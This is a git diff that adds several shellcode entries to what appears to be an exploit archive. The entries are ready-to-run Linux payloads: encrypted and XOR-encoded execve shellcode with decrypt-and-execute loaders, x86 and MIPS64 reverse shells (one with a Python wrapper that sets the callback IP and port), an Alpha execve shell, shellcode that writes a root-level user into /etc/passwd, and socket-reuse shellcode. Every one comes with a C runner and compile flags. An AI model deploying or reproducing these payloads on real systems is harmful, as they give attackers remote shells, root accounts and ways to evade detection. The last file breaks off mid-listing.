+    for (i=0; i<16; i++)
+        printf("%c", key[i]);
+    printf("\n");
+
+    printf("Original       = ");
+    for (i=0; i<codeLen; i++)
+        printf("\\x%02x", code[i]);
+    printf("\n");
+
+    printf("Encrypted      = ");
+    for (i=0; i<codeLen; i++)
+        printf("\\x%02x", encrypted[i]);
+    printf ("\n");
+
+    return 0;
+}
+######################################
+$ ./encrypt2rabbit 
+Encryption Key = someencryptkeyyy
+Original       = \x31\xc0\x50\x68\x2f\x2f\x6c\x73\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
+Encrypted      = \x7f\xaf\xa4\x1e\xb7\x11\x01\x92\xd5\x56\x95\x03\x7a\x4b\x07\x0b\x94\xf8\xd4\x86\x3d\xbc\x4c\xa3\x30
+
+################################################################################
+# Decryption/Execution
+################################################################################
+
+// File: decryptAndExecute.c
+// Author: Petr Javorik
+
+#include <string.h>
+#include <stdio.h>
+#include "../rabbit/code/rabbit.c"
+
+unsigned char encrypted[] = \
+"\x7f\xaf\xa4\x1e\xb7\x11\x01\x92\xd5\x56\x95\x03\x7a\x4b\x07\x0b\x94\xf8\xd4\x86\x3d\xbc\x4c\xa3\x30";
+
+int main(int argc, char **argv)
+{
+    ECRYPT_init();
+    ECRYPT_ctx ctx;
+    ECRYPT_keysetup(&ctx, argv[1], 128, 0);
+    u8 decrypted[200];
+    int codeLen = strlen(encrypted);
+    ECRYPT_process_bytes(0, &ctx, encrypted, decrypted, codeLen);
+
+    int (*DecryptedFun)() = (int(*)())decrypted;
+    DecryptedFun();
+}
+
+######################################
+$ ./decryptAndExecute someencryptkeyyy
+decryptAndExecute  decryptAndExecute.c  encrypt2rabbit  encrypt2rabbit.c  execve-stack  execve-stack.nasm  execve-stack.o
\ No newline at end of file
diff --git a/shellcodes/generator/46789.txt b/shellcodes/generator/46789.txt
new file mode 100644
index 000000000..1d4823549
--- /dev/null
+++ b/shellcodes/generator/46789.txt
@@ -0,0 +1,242 @@
+# Exploit Title: Linux/x86 - Reverse Shell Shellcode (91 Bytes) + Python Wrapper
+# Google Dork: NA
+# Date: 2019-05-01
+# Exploit Author: Dave Sully	
+# Vendor Homepage: 
+# Software Link: NA
+# Version: NA
+# Tested on: Ubuntu 16.04
+# CVE : NA
+
+#######################################################################
+#######################################################################
+
+# This is the raw assembly 
+
+#######################################################################
+#######################################################################
+
+; Filename: reverse_shell.nasm
+; Author:  Dave Sully
+; Website:  http://suls.co.uk
+; Purpose: Reverse shell in x86 assembly 
+
+global _start			
+
+section .text
+_start:
+
+	; Clear everthing we are using 
+	xor eax, eax 
+	xor ebx, ebx 
+	xor ecx, ecx 
+	xor edx, edx 
+	xor esi, esi
+	xor edi, edi
+
+	; Define structure for socket 
+	; push 0x0100007f ; Push IP to stack in reverse byte order ; need to revist the null bytes here  (127.0.0.1)
+	; We have a issue here in that the ip address 127.0.0.1 = 0x0100007f in hex which contains null bytes 
+	; Easiest way around this is to XOR the value with 0xffffffff
+	mov edi, 0xfeffff80 ; xor of 0x0100007f and 0xffffffff
+	xor edi, 0xffffffff
+	push edi
+	push word 0xb315 ; Push 5555 to the stack in reverse byte order 5555 in hex = 0x15b3 
+	push word 0x2 ; push 2  to the stack (AF-INET) 
+
+	; Create socket 
+	; s = socket(AF_INET, SOCK_STREAM, 0)
+	mov ax, 0x167 ; Syscall 359 (socket)
+	mov bl, 0x2 ; AF-INET (2) 
+	mov cl, 0x1 ; Sock stream (1) 
+	; dl should already be zero 
+	int 0x80 ; call system interupt to create socket 
+	xchg esi, eax ; socket file descriptor now stored in esi 
+
+	; Connect socket 
+	; connect(s, (struct sockaddr *)&addr, sizeof(addr));
+	mov ax, 0x16a ; Syscall 362 connect 
+	mov ebx, esi ; Move socket file descriptor into ebx 
+	mov ecx, esp ; Point ecx to the top of the stack which has our address structure on it 
+	mov dl, 0x10 ; Size of structure (16)
+	int 0x80 ; call system interupt to create connect 
+
+	; Dup input output and error file descriptors 
+	; dup2(s, 0); // Dup2 sycall = 63  
+	xor eax, eax ; Clear eax 
+	mov ebx, esi ; move socket id to ebx 
+	xor ecx, ecx ; Clear ecx 
+	mov cl, 0x2 ; set ecx to 2 
+loop:
+	mov al, 0x3f ; syscall 63 
+	int 0x80 ; call dup 2 
+	dec ecx  ; decrease ecx by 1 
+	jns loop ; jump if not signed back to loop, this should cycle 2,1,0
+
+	; Execute Shell 
+	; execve("/bin/sh",0 ,0); // Execve syscall = 11
+	; (const char *filename, char *const argv[], char *const envp[]);
+	xor eax,eax ; null eax 
+	mov al, 0xb ; syscall 11 into eax
+	xor ebx, ebx ; zero ebx 
+	push ebx ; push a null string to the stack to terminate our string 
+	push 0x68732f2f ; hs//
+	push 0x6e69622f ; nib/
+	mov ebx, esp ; point ebx at the stack
+	xor ecx, ecx ; clear ecx and edx as they are used in the syscall 
+	xor edx, edx
+	int 0x80 
+
+section .data
+
+#######################################################################
+#######################################################################
+
+### Compile and link as follows 
+
+nasm -f elf32 -o reverse_shell.o reverse_shell.nasm 
+gcc -o reverse_shell reverse_shell.o 
+
+
+#######################################################################
+#######################################################################
+
+### To configure IP and port use the following python3 wrapper script 
+
+#######################################################################
+#######################################################################
+
+
+#!/usr/bin/env python3 
+# File: wrapper.py
+# Author: Dave Sully 
+# Reverse shell wrapper in python3 
+# Usage: python3 wrapper.py 192.168.1.1 5000
+
+import argparse
+import socket 
+from struct import unpack
+
+print("\n*****************************************")
+print("***** Reverse shell wrapper script ******")
+print("*****************************************")
+
+# Grab command line args (ip and port) 
+parser = argparse.ArgumentParser() 
+parser.add_argument("ip")
+parser.add_argument("port")
+args = parser.parse_args() 
+# check port is in a valid range 
+if ((int(args.port) > 65535) or (int(args.port) < 256)):
+    print("\nPort number must be between 256 and 65535\n")
+    exit()
+
+# Xor Function 
+def xor_strings(str1,str2):
+    result =  int(str1,16) ^ int(str2,16)
+    return '{:x}'.format(result)
+
+# Process IP address
+print("\nIP address: "+ args.ip)
+# Convert IP to Hex 
+hexip = socket.inet_aton(args.ip).hex() 
+print("Hex IP Address: "+hexip)
+# Reverse the hex String 
+revhexip = hexip[6:8]
+revhexip = revhexip + hexip[4:6]
+revhexip = revhexip + hexip[2:4]
+revhexip = revhexip + hexip[0:2]
+# Xor the reversed hex address as the shellcode XORs this address to avoid null bytes 
+xored_ip = xor_strings(revhexip,"FFFFFFFF")
+print("XORed reverse hex IP Address: "+ xored_ip) 
+
+# Process Port
+print("\nPort: "+args.port)
+# Convert Port to hex 
+hexport = hex(int(args.port)).replace('0x','')
+if len(hexport)<4:
+    hexport = '0'+hexport
+print("Hex Port: "+hexport)
+revhexport = hexport[2:4]+ hexport[0:2] 
+print("Reverse Hex Port: "+revhexport)
+
+# Check for null bytes 
+if (xored_ip[0:2]=="00" or 
+    xored_ip[2:4]=="00" or 
+    xored_ip[4:6]=="00" or 
+    xored_ip[6:8]=="00" or 
+    revhexport[0:2]=="00" or 
+    revhexport[2:4]=="00"):
+    print("\n** WARNING ** Null Bytes detected in Xored IP or port shellcode,")
+    print("shellcode may not work !\n")
+
+# Construct Shellcode 
+shellcode= \
+"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2\\x31\\xf6\\x31\\xff\\xbf" + \
+    "\\x"+ xored_ip[6:8] + \
+    "\\x"+ xored_ip[4:6] + \
+    "\\x"+ xored_ip[2:4] + \
+    "\\x"+ xored_ip[0:2] + \
+"\\x83\\xf7\\xff\\x57\\x66\\x68" + \
+    "\\x"+ revhexport[2:4] + \
+    "\\x"+ revhexport[0:2] + \
+"\\x66\\x6a\\x02\\x66\\xb8\\x67\\x01\\xb3\\x02\\xb1\\x01\\xcd\\x80\\x96\\x66" + \
+"\\xb8\\x6a\\x01\\x89\\xf3\\x89\\xe1\\xb2\\x10\\xcd\\x80\\x31\\xc0\\x89\\xf3" + \
+"\\x31\\xc9\\xb1\\x02\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x31\\xc0\\xb0\\x0b" + \
+"\\x31\\xdb\\x53\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3" + \
+"\\x31\\xc9\\x31\\xd2\\xcd\\x80"
+# Output Shellcode 
+print("\nShellcode (Length 91 Bytes): \n")
+print(shellcode+"\n")
+
+#######################################################################
+#######################################################################
+
+# Example output
+
+*****************************************
+***** Reverse shell wrapper script ******
+*****************************************
+
+IP address: 127.0.0.1
+Hex IP Address: 7f000001
+XORed reverse hex IP Address: feffff80
+
+Port: 8080
+Hex Port: 1f90
+Reverse Hex Port: 901f
+
+Shellcode (Length 91 Bytes): 
+
+\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x31\xf6\x31\xff\xbf\x80\xff\xff\xfe\x83\xf7\xff\x57\x66\x68\x1f\x90\x66\x6a\x02\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x96\x66\xb8\x6a\x01\x89\xf3\x89\xe1\xb2\x10\xcd\x80\x31\xc0\x89\xf3\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\xb0\x0b\x31\xdb\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xcd\x80
+
+
+#######################################################################
+#######################################################################
+
+# To compile shellcode from the wrapper script use the following C program 
+# Replacing the shellcode with the wrapper script shellcode output
+
+#######################################################################
+#######################################################################
+
+// Filename: shellcode.c
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x31\xf6\x31\xff\xbf\x80\xff\xff\xfe\x83\xf7\xff\x57\x66\x68\x1f\x90\x66\x6a\x02\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x96\x66\xb8\x6a\x01\x89\xf3\x89\xe1\xb2\x10\xcd\x80\x31\xc0\x89\xf3\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\xb0\x0b\x31\xdb\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xcd\x80";
+
+main()
+{
+	printf("Shellcode Length:  %d\n", strlen(code));
+	int (*ret)() = (int(*)())code;
+	ret();
+}
+
+#######################################################################
+#######################################################################
+
+# Compile with 
+
+gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
\ No newline at end of file
diff --git a/shellcodes/generator/46800.txt b/shellcodes/generator/46800.txt
new file mode 100644
index 000000000..4e86fc5b1
--- /dev/null
+++ b/shellcodes/generator/46800.txt
@@ -0,0 +1,139 @@
+# Title: Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes)
+# Author: Xavi Beltran
+# Date: 05/05/2019
+# Contact: xavibeltran@protonmail.com
+# Purpose: spawn /bin/sh shell
+# Tested On: Ubuntu 3.5.0-17-generic
+# Arch: x86
+# Size: 59 bytes
+
+############################################## sh.nasm ###############################################
+global _start			
+section .text
+_start:
+	xor eax, eax
+	push eax
+	push 0x68732f2f
+	push 0x6e69622f
+	mov ebx, esp
+	push eax
+	mov edx, esp
+	push ebx
+	mov ecx, esp
+	mov al, 11
+	int 0x80
+
+
+###################################### original shellcode #############################################
+\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
+
+
+#################################  encoder-xor-multiple-keys.py  ######################################
+#!/usr/bin/python
+# Autor: Xavi Beltran
+# Date: 05/05/2019
+
+shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
+
+encoded = ""
+encoded2 = ""
+
+print 'Encoded shellcode ...'
+
+i = 1
+for x in bytearray(shellcode) :
+
+	if  i == 11:
+		i = 1
+	y = x^i
+	encoded += '\\x'
+	encoded += '%02x' % y
+
+	encoded2 += '0x'
+	encoded2 += '%02x,' %y
+	
+	i = i + 0x01
+
+print encoded
+
+print encoded2
+
+print 'Len: %d' % len(bytearray(shellcode))
+
+
+######################################### Encoded Shellcode  ###############################################
+
+socket@ubuntu:~/Assesments/4$ python encoder-xor-multiple-keys.py 
+Encoded shellcode ...
+\x30\xc2\x53\x6c\x2a\x29\x74\x60\x61\x25\x63\x6b\x6d\x8d\xe6\x56\x8e\xea\x5a\x83\xe0\xb2\x08\xc9\x85
+0x30,0xc2,0x53,0x6c,0x2a,0x29,0x74,0x60,0x61,0x25,0x63,0x6b,0x6d,0x8d,0xe6,0x56,0x8e,0xea,0x5a,0x83,0xe0,0xb2,0x08,0xc9,0x85,
+Len: 25
+
+
+#################################### decoder-xor-multiple-keys.nasm  ###############################################
+
+; Filename: xor-decoder-multiple-keys.nasm
+; Author:  Xavi Beltran
+; Date: 05/05/2019
+
+global _start			
+
+section .text
+_start:
+
+	xor edx, edx
+	mov dl, 1
+	jmp short call_decoder
+
+decoder:
+	pop esi
+	xor ecx, ecx
+	mov cl, 25
+
+
+decode:
+	cmp dl, 0x0b
+	jz xor_counter
+	xor byte [esi], dl
+	inc esi
+	inc dl
+	loop decode
+
+	jmp short Shellcode
+
+xor_counter:
+	mov dl, 1
+	jmp decode
+
+call_decoder:
+
+	call decoder
+	Shellcode: db 0x30,0xc2,0x53,0x6c,0x2a,0x29,0x74,0x60,0x61,0x25,0x63,0x6b,0x6d,0x8d,0xe6,0x56,0x8e,0xea,0x5a,0x83,0xe0,0xb2,0x08,0xc9,0x85
+
+
+############################################### final shellcode ################################################
+
+socket@ubuntu:~/Assesments/4$ ./objdump_parser.sh decoder-xor-multiple-keys
+"\x31\xd2\xb2\x01\xeb\x17\x5e\x31\xc9\xb1\x19\x80\xfa\x0b\x74\x09\x30\x16\x46\xfe\xc2\xe2\xf4\xeb\x09\xb2\x01\xeb\xee\xe8\xe4\xff\xff\xff\x30\xc2\x53\x6c\x2a\x29\x74\x60\x61\x25\x63\x6b\x6d\x8d\xe6\x56\x8e\xea\x5a\x83\xe0\xb2\x08\xc9\x85"
+socket@ubuntu:~/Assesments/4$ ./shellcode 
+Shellcode Length:  59
+$ whoami
+socket
+
+socket@ubuntu:~/Assesments/4$ cat shellcode.c 
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\x31\xd2\xb2\x01\xeb\x17\x5e\x31\xc9\xb1\x19\x80\xfa\x0b\x74\x09\x30\x16\x46\xfe\xc2\xe2\xf4\xeb\x09\xb2\x01\xeb\xee\xe8\xe4\xff\xff\xff\x30\xc2\x53\x6c\x2a\x29\x74\x60\x61\x25\x63\x6b\x6d\x8d\xe6\x56\x8e\xea\x5a\x83\xe0\xb2\x08\xc9\x85";
+
+main()
+{
+
+	printf("Shellcode Length:  %d\n", strlen(code));
+
+	int (*ret)() = (int(*)())code;
+
+	ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux/47239.c b/shellcodes/linux/47239.c
new file mode 100644
index 000000000..2d6b30bdc
--- /dev/null
+++ b/shellcodes/linux/47239.c
@@ -0,0 +1,49 @@
+/* Alpha (AXP) Linux/Tru64 execve() shellcode
+*  ==========================================
+* This shellcode uses the stack to store a generated
+* "callsys" instruction, due to this it needs executable
+* stack. To test on Linux use "execstack -s <bin>" and
+* on Tru64 use "sysconfig -r proc executable_stack=1".
+* 
+* Tested against Tru64 5.1B & Linux 2.6.26-2-alpha-generic
+*
+* -- Hacker Fantastic (https://hacker.house)
+*/
+#include <stdio.h>
+#include <stdlib.h>
+
+unsigned char shellcode[] = {
+	"\x80\xff\xde\x23"   /* lda $sp,-128($sp)   */
+	"\x73\x68\x3f\x24"   /* ldil $1, 0x68732f2f */
+	"\x2f\x2f\x21\x20"   /* sll $1, 0x20        */
+	"\x21\x17\x24\x48"   /* ldil $2, 0x6e69622f */
+	"\x69\x6e\x5f\x24"   /* addq $1, $2, $1     */
+	"\x2f\x62\x42\x20"   /* stq $31, -32($sp)   */
+	"\x01\x04\x22\x40"   /* stq $31, -24($sp)   */
+	"\xe0\xff\xfe\xb7"   /* stq $31, -8($sp)    */
+	"\xe8\xff\xfe\xb7"   /* stq $1, -16($sp)    */
+	"\xf8\xff\xfe\xb7"   /* mov $sp, $16        */
+	"\xf0\xff\x3e\xb4"   /* subq $16, 0x10, $16 */
+	"\x10\x04\xfe\x47"   /* stq $16, -40($sp)   */
+	"\x30\x15\x02\x42"   /* mov $sp, $17        */
+	"\xd8\xff\x1e\xb6"   /* subq $17, 0x28, $17 */
+	"\x11\x04\xfe\x47"   /* mov $sp, $18        */
+	"\x31\x15\x25\x42"   /* subq $18, 0x18, $18 */
+	"\x12\x04\xfe\x47"   /* ldil $0, 0xffffff3c */
+	"\x32\x15\x43\x42"   /* ldil $1, 0xffffff01 */
+	"\x3c\xff\x1f\x20"   /* subq $0, $1, $0     */
+	"\x01\xff\x3f\x20"   /* ldil $1, 0xffffff84 */
+	"\x20\x05\x01\x40"   /* ldil $2, 0xffffff01 */
+	"\x84\xff\x3f\x20"   /* subq $1, $2, $1     */
+	"\x01\xff\x5f\x20"   /* stl $1, -48($sp)    */
+	"\x21\x05\x22\x40"   /* subq $sp, 0x30, $sp */
+	"\xd0\xff\x3e\xb0"   /* jmp $sp,($sp),0xff10 */
+	"\x3e\x15\xc6\x43"
+	"\xc4\x3f\xde\x6b"
+};
+
+int main(){
+	int (*func)();
+        func = (int (*)())shellcode;
+        func();
+}
\ No newline at end of file
diff --git a/shellcodes/linux/47296.c b/shellcodes/linux/47296.c
new file mode 100644
index 000000000..8b14c90f1
--- /dev/null
+++ b/shellcodes/linux/47296.c
@@ -0,0 +1,113 @@
+/*
+ *    # Reverse shell shellcode for Linux MIPS64 (mips64el)
+ *    # Default port: tcp/4444
+ *    # Host: localhost
+ *    # Date: August 19 - 2019	
+ *    # Author: Antonio de la Piedra
+ *    # Tested on: MIPS Malta - Linux debian-mips64el 4.9.0-3-5kc-malta 
+ *    # Size: 157 bytes
+ *    # Compile with: gcc -fno-stack-protector -z execstack main.c -o main -g
+ */
+
+#include <stdio.h>
+#include <string.h>
+
+/*
+.text
+        .global __start
+__start:
+
+        dli $s4, -3
+        dli $s5, -17
+        nor $a0,$s4,$zero
+        nor $a1,$s4,$zero
+        slti    $a2,$zero,-1
+        li      $v0,5040 
+        syscall 0x40404
+
+        sw   $v0, -32($sp) 
+        lw $a0, -32($sp)
+
+        nor $t0,$s4,$zero 
+        sw $t0, -12($sp)
+        dli     $t2,0x5c11 
+        sw      $t2,-10($sp)
+        dli     $t1,0x0101017f 
+        sw      $t1,-8($sp)
+        daddiu  $a1,$sp,-12
+        nor $a2,$s5,$zero
+        dli     $v0,5041 
+        syscall 0x40404
+
+        nor $a1,$s4,$zero
+        dli     $s0, -1
+loop:
+        dli     $v0,5032
+        syscall 0x40404
+        daddi   $a1,$a1,-1
+        bne     $a1,$s0,loop
+        dli     $t0,0x69622f2f 
+        sw      $t0,-12($sp)
+        dli     $t1,0x68732f6e
+        dli     $t1,0x68732f6e
+        sw      $t1,-8($sp)
+        sw      $zero,-4($sp)
+        daddiu $a0,$sp,-12
+        slti    $a1,$zero,-1   
+        slti    $a2,$zero,-1
+        dli     $v0,5057
+        syscall 0x40404
+.align 8
+*/
+
+unsigned char code[] = 
+      "\xfd\xff\x14\x24"
+      "\xfd\xff\x14\x24"
+      "\xef\xff\x15\x24"
+      "\x27\x20\x80\x02"
+      "\x27\x28\x80\x02"
+      "\xff\xff\x06\x28"
+      "\xb0\x13\x02\x24"
+      "\x0c\x01\x01\x01"
+      "\xe0\xff\xa2\xaf"
+      "\xe0\xff\xa4\x8f"
+      "\x27\x60\x80\x02"
+      "\xf4\xff\xac\xaf"
+      "\x11\x5c\x0e\x24"
+      "\xf6\xff\xae\xaf"
+      "\x01\x01\x0d\x3c"
+      "\x7f\x01\xad\x35"
+      "\xf8\xff\xad\xaf"
+      "\xf4\xff\xa5\x67"
+      "\x27\x30\xa0\x02"
+      "\xb1\x13\x02\x24"
+      "\x0c\x01\x01\x01"
+      "\x27\x28\x80\x02"
+      "\xff\xff\x10\x24"
+      "\xa8\x13\x02\x24"
+      "\x0c\x01\x01\x01"
+      "\xff\xff\xa5\x60"
+      "\xfc\xff\xb0\x14"
+      "\x62\x69\x0c\x3c"
+      "\x2f\x2f\x8c\x35"
+      "\xf4\xff\xac\xaf"
+      "\x73\x68\x0d\x3c"
+      "\x6e\x2f\xad\x35"
+      "\xf8\xff\xad\xaf"
+      "\xfc\xff\xa0\xaf"
+      "\xf4\xff\xa4\x67"
+      "\xff\xff\x05\x28"
+      "\xff\xff\x06\x28"
+      "\xc1\x13\x02\x24"
+      "\x0c\x01\x01\x01";
+
+int main(int argc, char ** argv)
+{
+        void(*s)(void);
+
+        printf("Shellcode Length:  %d\n", strlen(code));
+
+        s = code;
+        s();
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux/47511.c b/shellcodes/linux/47511.c
new file mode 100644
index 000000000..21b9bdbf7
--- /dev/null
+++ b/shellcodes/linux/47511.c
@@ -0,0 +1,61 @@
+# Exploit Title: Linux/x86 - adduser 'User' to /etc/passwd ShellCode (74 bytes)
+# Date: 2019-10-12
+# Author: bolonobolo
+# Vendor Homepage: None
+# Software Link: None
+# Tested on: Linux x86
+# Comments: add user "User" to /etc/passwd
+# CVE: N/A
+
+/*
+00000000  31DB              xor ebx,ebx
+00000002  31C9              xor ecx,ecx
+00000004  66B90104          mov cx,0x401
+00000008  F7E3              mul ebx
+0000000A  53                push ebx
+0000000B  6873737764        push dword 0x64777373
+00000010  68632F7061        push dword 0x61702f63
+00000015  682F2F6574        push dword 0x74652f2f
+0000001A  8D1C24            lea ebx,[esp]
+0000001D  B005              mov al,0x5
+0000001F  CD80              int 0x80
+00000021  93                xchg eax,ebx
+00000022  F7E2              mul edx
+00000024  686E2F7368        push dword 0x68732f6e
+00000029  683A2F6269        push dword 0x69622f3a
+0000002E  68303A3A2F        push dword 0x2f3a3a30
+00000033  683A3A303A        push dword 0x3a303a3a
+00000038  6855736572        push dword 0x72657355
+0000003D  8D0C24            lea ecx,[esp]
+00000040  B214              mov dl,0x14
+00000042  B004              mov al,0x4
+00000044  CD80              int 0x80
+00000046  2C13              sub al,0x13
+00000048  CD80              int 0x80
+
+
+
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\x31\xdb\x31\xc9\x66\xb9\x01\x04\xf7\xe3\x53"
+"\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68"
+"\x2f\x2f\x65\x74\x8d\x1c\x24\xb0\x05\xcd\x80"
+"\x93\xf7\xe2\x68\x6e\x2f\x73\x68\x68\x3a\x2f"
+"\x62\x69\x68\x30\x3a\x3a\x2f\x68\x3a\x3a\x30"
+"\x3a\x68\x55\x73\x65\x72\x8d\x0c\x24\xb2\x14"
+"\xb0\x04\xcd\x80\x2c\x13\xcd\x80";
+
+void main()
+{
+
+	printf("Shellcode Length:  %d\n", strlen(code));
+
+	int (*ret)() = (int(*)())code;
+
+	ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux/47513.c b/shellcodes/linux/47513.c
new file mode 100644
index 000000000..9e4c6e315
--- /dev/null
+++ b/shellcodes/linux/47513.c
@@ -0,0 +1,45 @@
+# Exploit Title: Linux/x86 - execve /bin/sh ShellCode (25 bytes)
+# Date: 2019-10-14
+# Author: bolonobolo
+# Vendor Homepage: None
+# Software Link: None
+# Tested on: Linux x86
+# CVE: N/A
+
+/*
+global _start			
+
+section .text
+_start:
+
+
+	cdq		        ; xor edx
+	mul edx
+	lea ecx, [eax]
+	mov esi, 0x68732f2f
+	mov edi, 0x6e69622f
+	push ecx                ; push NULL in stack
+	push esi
+	push edi                ; push hs/nib// in stack
+	lea ebx, [esp]          ; load stack pointer to ebx
+	mov al, 0xb             ; load execve in eax
+	int 0x80                ; execute
+
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\x99\xf7\xe2\x8d\x08\xbe\x2f\x2f\x73\x68\xbf\x2f\x62\x69\x6e\x51\x56\x57\x8d\x1c\x24\xb0\x0b\xcd\x80";
+
+void main()
+{
+
+	printf("Shellcode Length:  %d\n", strlen(code));
+
+	int (*ret)() = (int(*)())code;
+
+	ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux/47514.c b/shellcodes/linux/47514.c
new file mode 100644
index 000000000..856fe9459
--- /dev/null
+++ b/shellcodes/linux/47514.c
@@ -0,0 +1,89 @@
+# Exploit Title: Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)
+# Date: 2019-10-16
+# Author:  bolonobolo
+# Tested on: Linux x86
+# Software: N/A
+# CVE: N/A
+
+/*
+global _start			
+
+section .text
+_start:
+
+
+	;socket()
+	xor ecx, ecx        ; xoring ECX
+	xor ebx, ebx        ; xoring EBX
+	mul ebx             ; xoring EAX and EDX
+	inc cl              ; ECX should be 1
+	inc bl
+	inc bl              ; EBX should be 2
+	mov ax, 0x167       ;
+	int 0x80            ; call socket()
+
+	;connect()          ; move the return value of socket
+	xchg ebx, eax       ; from EAX to EBX ready for the next syscalls
+
+	; push sockaddr structure in the stack
+	dec cl
+	push ecx                ; unused char (0)
+
+	; move the lenght (16 bytes) of IP in EDX
+	mov dl, 0x16
+
+	; the ip address 1.0.0.127 could be 4.3.3.130 to avoid NULL bytes
+	mov ecx, 0x04030382              ; mov ip in ecx
+	sub ecx, 0x03030303              ; subtract 3.3.3.3 from ip
+	push ecx                         ; load the real ip in the stack
+	push word 0x5c11                 ; port 4444
+	push word 0x02                   ; AF_INET family
+	lea ecx, [esp]
+	                                 ; EBX still contain the value of the
+opened socket
+	mov ax, 0x16a
+	int 0x80
+
+	; dup2()
+	    xor ecx, ecx
+	    mov cl, 0x3
+
+	dup2:
+	    xor eax, eax
+	                                 ; EBX still contain the value of the
+opened socket
+	    mov al, 0x3f
+	    dec cl
+	    int 0x80
+	    jnz dup2
+
+	; execve() from the previous polymorphic analysis 25 bytes
+	cdq                     ; xor edx
+	mul edx                 ; xor eax
+	lea ecx, [eax]          ; xor ecx
+	mov esi, 0x68732f2f
+	mov edi, 0x6e69622f
+	push ecx                ; push NULL in stack
+	push esi                ; push hs/ in stack
+	push edi                ; push nib// in stack
+	lea ebx, [esp]          ; load stack pointer to ebx
+	mov al, 0xb             ; load execve in eax
+	int 0x80
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\x31\xc9\x31\xdb\xf7\xe3\xfe\xc1\xfe\xc3\xfe\xc3\x66\xb8\x67\x01\xcd\x80\x93\xfe\xc9\x51\xb2\x16\xb9\x82\x03\x03\x04\x81\xe9\x03\x03\x03\x03\x51\x66\x68\x11\x5c\x66\x6a\x02\x8d\x0c\x24\x66\xb8\x6a\x01\xcd\x80\x31\xc9\xb1\x03\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\x75\xf6\x99\xf7\xe2\x8d\x08\xbe\x2f\x2f\x73\x68\xbf\x2f\x62\x69\x6e\x51\x56\x57\x8d\x1c\x24\xb0\x0b\xcd\x80";
+
+void main()
+{
+
+	printf("Shellcode Length:  %d\n", strlen(code));
+
+	int (*ret)() = (int(*)())code;
+
+	ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux/47530.txt b/shellcodes/linux/47530.txt
new file mode 100644
index 000000000..128e267bd
--- /dev/null
+++ b/shellcodes/linux/47530.txt
@@ -0,0 +1,82 @@
+# Exploit Name: Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)
+# Author : WangYihang
+# Date: 2019-10-22
+# Tested on: Linux_x86
+# Shellcode Length: 42
+# CVE: N/A
+;================================================================================
+# Shellcode :
+char shellcode[] = "\x31\xdb\xb3\x03\x31\xc9\xb1\x03\xfe\xc9\x31\xc0\xb0\x3f\xcd\x80\x80\xf9\xff\x75\xf3\x31\xc9\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
+;================================================================================
+# Python :
+shellcode = "\x31\xdb\xb3\x03\x31\xc9\xb1\x03\xfe\xc9\x31\xc0\xb0\x3f\xcd\x80\x80\xf9\xff\x75\xf3\x31\xc9\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
+;================================================================================
+; Build :
+; $ nasm -f elf32 shellcode.asm -o shellcode
+; $ objdump -d shellcode
+
+; shellcode:     file format elf32-i386
+
+
+; Disassembly of section .text:
+
+; 00000000 <_start>:
+;    0: 31 db                 xor    %ebx,%ebx
+;    2: b3 03                 mov    $0x3,%bl
+;    4: 31 c9                 xor    %ecx,%ecx
+;    6: b1 03                 mov    $0x3,%cl
+
+; 00000008 <dup2>:
+;    8: fe c9                 dec    %cl
+;    a: 31 c0                 xor    %eax,%eax
+;    c: b0 3f                 mov    $0x3f,%al
+;    e: cd 80                 int    $0x80
+;   10: 80 f9 ff             cmp    $0xff,%cl
+;   13: 75 f3                 jne    8 <dup2>
+
+; 00000015 <execve>:
+;   15: 31 c9                 xor    %ecx,%ecx
+;   17: 6a 0b                 push   $0xb
+;   19: 58                   pop    %eax
+;   1a: 99                   cltd  
+;   1b: 52                   push   %edx
+;   1c: 68 2f 2f 73 68       push   $0x68732f2f
+;   21: 68 2f 62 69 6e       push   $0x6e69622f
+;   26: 89 e3                 mov    %esp,%ebx
+;   28: cd 80                 int    $0x80
+
+;================================================================================
+; Assembly language source code :
+; shellcode.asm
+;global _start
+;    _start:
+;        set ebx to the old socket fd = 3
+;        xor ebx, ebx
